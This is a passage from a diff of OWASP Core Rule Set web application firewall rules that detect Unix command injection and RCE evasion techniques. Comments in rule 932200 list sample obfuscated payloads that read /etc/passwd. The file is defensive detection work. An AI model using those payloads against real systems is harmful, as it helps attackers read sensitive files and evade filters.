logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# [ Unix command injection ] +# +# This rule targets pefix + the source command (dot character) at PL2. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932231.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932231 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\v].*\b" \ + "id:932231,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This is a stricter sibling of rule 932130. +# +# It applies the same regular expression to the +# User-Agent and Referer HTTP headers. +# +# Unlike the sibling rule, this rule runs in phase 1. +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*})|[<>]\(.*\)|\[!?.+\])" \ + "id:932131,\ + phase:1,\ + block,\ + capture,\ + t:none,t:cmdLine,\ + msg:'Remote Command Execution: Unix Shell Expression Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932200 ]=- +# +# Block RCE Bypass using different techniques: +# - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/) +# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) +# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) +# +# Examples: +# - foo;cat$u+/etc$u/passwd +# - bar;cd+/etc;/bin$u/ca*+passwd +# - foo;ca\t+/et\c/pa\s\swd +# - foo;c'at'+/etc/pa's'swd +# - foo;c$@at+/et$@c/pas$@swd +# - foo;c$!at+/et$!c/pas$!swd +# - foo;c$*at+/et$*c/pas$*swd +# - foo;c$?at+/et$?c/pas$?swd +# - foo;c$-at+/et$-c/pas$-swd +# - foo;c$_at+/et$_c/pas$_swd +# - foo;c$$at+/et$$c/pas$$swd +# +# Regex notes: https://regex101.com/r/V6wrCO/1 +# +# Regular expression generated from regex-assembly/932200.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932200 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]" \ + "id:932200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932200_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932200_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule MATCHED_VAR "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932205 ]=- +# +# Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200 +# and must be handled with additional checks. +# +# Regular expression generated from regex-assembly/932205.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932205 +# +SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]+\.[^;\?]+[;\?](.*(['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]))" \ + "id:932205,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.2} found within %{TX.932205_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932205_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule TX:1 "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932206 ]=- +# +# Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200 +# and must be handled with additional checks. +# +# Regular expression generated from regex-assembly/932206.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932206 +# +SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{])" \ + "id:932206,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932206_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932206_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule MATCHED_VAR "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/932220.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932220 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\v]*|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?E[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?T|a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ks])|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[8-9][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?9|[au][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[gr])|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|q[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[c-dgi]|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[chr][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|o|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b)|j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|q)|k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|v)|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[at][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?g|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dt]|[g-hu]|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cr]|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l|[co][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ex]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|l)|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|c)|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|z)|y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h))" \ + "id:932220,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection with pipe',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ Rule 932240 ]=- +# +# Generic RCE Bypass blocking using different techniques: see https://github.com/coreruleset/coreruleset/issues/2632 +# +# This rule complements rule 932230 with generic evasion detection. +# Anything that uses a well-known evasion technique should be blocked at this level. +# The chained rule will exclude false positives due to german thousands separators (e.g., 10'000). +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932240.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932240 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?i)[\-0-9_a-z]+(?:[\"'\[-\]]+|\$+[!#\*\-0-9\?-@\x5c_a-\{]+|``|[\$<>]\(\))[\s\v]*[\-0-9_a-z]+" \ + "id:932240,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection evasion attempt detected',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932240_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932240_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \ + "t:none,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + + +# [ Sqlite System Command Execution ] +# +# This rule prevents execution of SQLite CLI commands like .system and .shell +# +# You can find a vulnerable script and a sample payload here: +# https://github.com/qxxxb/ctf/tree/master/2021/zer0pts_ctf/baby_sqli +# +# List of sqlite3 CLI commands: +# https://sqlite.org/cli.html +# +# Regular expression generated from regex-assembly/932210.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932210 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 